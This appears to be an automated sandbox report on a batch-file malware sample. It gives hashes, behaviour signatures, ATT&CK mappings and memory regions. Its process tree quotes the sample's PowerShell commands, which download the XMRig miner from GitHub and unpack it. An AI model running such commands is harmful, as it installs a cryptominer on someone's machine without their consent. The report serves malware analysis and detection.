Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 02:54

General

  • Target

    7.bat

  • Size

    599B

  • MD5

    798b979417aa88e5323ead9be2d8425c

  • SHA1

    a54c5133c71afddf697f302b36bdb930c72852ce

  • SHA256

    f83d724987f9f4a0843c0b0abd01f3f5ceccbc8e7babad76c2639e1bef2fee07

  • SHA512

    a4f2ff598bc26b5ee7778b34b34aafd20e43f714c5f841b9fe73cdc6e1c3e47e44ffb94ff06ccd7dd263116201ff6754c956c1ea8f588acf6927f35446b5036b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\7.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2108
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip', 'xmrig-6.21.3-msvc-win64.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:820
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'xmrig-6.21.3-msvc-win64.zip' -DestinationPath '.'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2656

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EYW7L5U55CYR1C5420W5.temp
    Filesize

    7KB

    MD5

    163eb5511ee96cfeaa3c9b97ffdff7b3

    SHA1

    dcd668f7f0b87f4975a395742c66c1b3b3f36233

    SHA256

    c5093ce8ecbc97a109ebf4bdfad2649ff0fe3fe29aabca476f978c841b36afd4

    SHA512

    9b6f35400a3a4927ba13cd97783fa804efdbd7299a09139ca4d136b92e74c259a95732e246696beadadf02d90f19190d17b8033b7ea7f251f51889443884221c

  • memory/820-4-0x000007FEF60CE000-0x000007FEF60CF000-memory.dmp
    Filesize

    4KB

  • memory/820-5-0x000000001B750000-0x000000001BA32000-memory.dmp
    Filesize

    2.9MB

  • memory/820-6-0x00000000021C0000-0x00000000021C8000-memory.dmp
    Filesize

    32KB

  • memory/820-8-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp
    Filesize

    9.6MB

  • memory/820-7-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp
    Filesize

    9.6MB

  • memory/820-9-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp
    Filesize

    9.6MB

  • memory/820-10-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp
    Filesize

    9.6MB

  • memory/820-11-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp
    Filesize

    9.6MB

  • memory/820-12-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp
    Filesize

    9.6MB

  • memory/2656-19-0x0000000002690000-0x0000000002698000-memory.dmp
    Filesize

    32KB

  • memory/2656-18-0x000000001B520000-0x000000001B802000-memory.dmp
    Filesize

    2.9MB